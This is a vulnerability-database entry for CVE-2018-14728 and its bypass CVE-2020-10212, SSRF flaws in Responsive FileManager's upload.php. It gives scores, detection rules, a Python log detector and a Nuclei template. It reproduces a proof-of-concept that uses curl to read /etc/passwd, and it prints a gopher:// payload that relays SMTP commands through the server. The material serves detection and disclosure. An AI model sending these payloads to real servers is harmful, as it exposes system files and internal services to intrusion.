CVE-2018-14728
Published 2018-08-03

CVE-2018-14728: upload.php in Responsive FileManager 9.13.1 allows SSRF via the url parameter.

Priority P2 · 77 · critical · 9.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 76.51% (99.5th percentile)
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tecrail | responsive_filemanager | — | — |
| tecrail | responsive_filemanager | — | — |
| tecrail | responsive_filemanager | — | — |
Detection & IOCs (extracted from sources)
command: fldr=&url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%[email protected]%3E%250d%250aRCPT%20TO%3A%[email protected]%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%[email protected]%3E%250d%250aTo%3A%20%[email protected]%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
yara
regex: root:.*:0:0:
- Monitor POST requests to /filemanager/upload.php containing a 'url' parameter with schemes such as file://, gopher://, or internal IP ranges (e.g., 169.254.169.254) in the request body, indicating SSRF exploitation attempts.
- Detect SSRF bypass attempts where a .ico filename is appended to PATH_INFO of upload.php to circumvent file-extension blocking controls.
- Watch for DNS pinning bypass attempts where an attacker-controlled hostname resolves to 0.0.0.0 to reach internal services via the url parameter of upload.php.
- Alert on POST bodies to upload.php containing gopher:// scheme URLs targeting internal ports (e.g., port 25), which can be used to relay SMTP commands via SSRF.
- Successful exploitation of CVE-2018-14728 may return /etc/passwd content in the HTTP response body; detect responses matching the pattern root:.*:0:0: from upload.php endpoints.
- CVE-2018-14728 was incompletely fixed; CVE-2020-10212 covers bypass techniques (PATH_INFO .ico suffix and DNS pinning to 0.0.0.0) that still affect versions 9.13.4 and 9.14.0, so detections must account for both the original and bypass variants.
- File-extension blocking in upload.php is bypassable via PATH_INFO manipulation (e.g., appending .ico), meaning extension-based WAF/IDS rules alone are insufficient to block SSRF payloads.
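
The checks listed above can be combined into one log-side detector. The following is an added example, not code from the advisory sources or from Responsive FileManager. The record layout, the finding labels, the http/https allowlist, and the hostname-to-address map (standing in for resolver or DNS logs) are assumptions, and the sample records are constructed.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

PASSWD_RE = re.compile(r"root:.*:0:0:")   # response pattern listed on the page
ALLOWED_SCHEMES = {"http", "https"}       # assumption: only web fetches are legitimate

def is_internal(addr):
    ip = ipaddress.ip_address(addr)
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_unspecified

def inspect(method, path, body, response="", dns=None):
    """Return findings for one request/response record against upload.php."""
    findings = []
    _, sep, path_info = path.partition("upload.php")
    if method != "POST" or not sep:
        return findings
    # Bypass variant: a .ico name appended as PATH_INFO after upload.php
    if path_info.split("?")[0].lower().endswith(".ico"):
        findings.append("pathinfo-ico-suffix")
    for raw in parse_qs(body, keep_blank_values=True).get("url", []):
        parts = urlsplit(raw)
        if parts.scheme.lower() not in ALLOWED_SCHEMES:
            findings.append("scheme:" + parts.scheme.lower())
        host = parts.hostname or ""
        try:
            ipaddress.ip_address(host)
            addrs = [host]                      # literal IP in the URL
        except ValueError:
            addrs = (dns or {}).get(host, [])   # hostname: answers seen in DNS logs
        if any(is_internal(a) for a in addrs):
            findings.append("internal-dest:" + host)
    if PASSWD_RE.search(response):
        findings.append("passwd-in-response")
    return findings

# Constructed sample records: (method, path, POST body, response body)
SAMPLES = [
    ("POST", "/filemanager/upload.php", "fldr=&url=file:///etc/passwd",
     "root:x:0:0:root:/root:/bin/bash"),
    ("POST", "/filemanager/upload.php", "fldr=&url=gopher://127.0.0.1:25/x", ""),
    ("POST", "/filemanager/upload.php/a.ico", "fldr=&url=http://pin.example.test/", ""),
    ("POST", "/filemanager/upload.php", "fldr=&url=https://cdn.example.test/logo.png", ""),
]
# Constructed resolver answers (hypothetical hostnames)
DNS = {"pin.example.test": ["0.0.0.0"], "cdn.example.test": ["93.184.216.34"]}

def run_samples():
    return [inspect(m, p, b, r, DNS) for m, p, b, r in SAMPLES]
```

A hostname can only be judged against the addresses it resolved to at fetch time, so the map should come from the resolver the web server actually used.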
CVSS provenance
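| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |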
GHSA
GHSA-66f3-j5p3-p6pc: upload
ghsa_unreviewed·2022-05-24·CVSS 9.8
CVE-2020-10212 [CRITICAL] GHSA-66f3-j5p3-p6pc: upload
upload.php in Responsive FileManager 9.13.4 and 9.14.0 allows SSRF via the url parameter because file-extension blocking is mishandled and because it is possible for a DNS hostname to resolve to an internal IP address. For example, an SSRF attempt may succeed if a .ico filename is added to the PATH_INFO. Also, an attacker could create a DNS hostname that resolves to the 0.0.0.0 IP address for DNS pinning. NOTE: this issue exists because of an incomplete fix for CVE-2018-14728.
GHSA
GHSA-4954-r44g-wx43: upload
ghsa_unreviewed·2022-05-14
CVE-2018-14728 [CRITICAL] CWE-918 GHSA-4954-r44g-wx43: upload
upload.php in Responsive FileManager 9.13.1 allows SSRF via the url parameter.
No detection rules found.
Exploit-DB
Responsive Filemanager 9.13.1 - Server-Side Request Forgery
exploitdb·2018-07-30·CVSS 9.8
CVE-2018-14728 [CRITICAL] Responsive Filemanager 9.13.1 - Server-Side Request Forgery
Responsive Filemanager 9.13.1 - Server-Side Request Forgery
---
```
# Exploit Title: Responsive filemanager 9.13.1 - Server-Side Request Forgery
# Date: 2018-07-29
# Exploit Author: GUIA BRAHIM FOUAD
# Vendor Homepage: http://responsivefilemanager.com/
# Software Link: https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.13.1/responsive_filemanager.zip
# Version: 9.13.1
# Tested on: responsive filemanager version: 9.13.1, php version: 7.0
# CVE : CVE-2018-14728
# PoC
curl 'http://localhost/filemanager/upload.php' --data 'fldr=&url=file:///etc/passwd'
curl 'http://localhost/filemanager/upload.php' --data 'fldr=&url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%[email protected]%3E%250d%250aRCPT%20TO%3A%[email protected]%3E%250d%250aDATA%250d%250aFrom%3A%20%5
```
Nuclei
Responsive filemanager 9.13.1 Server-Side Request Forgery
nuclei·CVSS 9.8
CVE-2018-14728 [CRITICAL] Responsive filemanager 9.13.1 Server-Side Request Forgery
Responsive filemanager 9.13.1 Server-Side Request Forgery
Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter.
Template:
```yaml
id: CVE-2018-14728

info:
  name: Responsive filemanager 9.13.1 Server-Side Request Forgery
  author: madrobot
  severity: critical
  description: Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter.
  impact: |
    An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks.
  remediation: |
    Upgrade to a patched version of Responsive Filemanager or apply the necessary security patches to mitigate the SSRF vulnerability.
  reference:
    - http://packetstormsecurity.com/files/148742/Responsive-
```
No writeups or analysis indexed.
2018-08-03
Published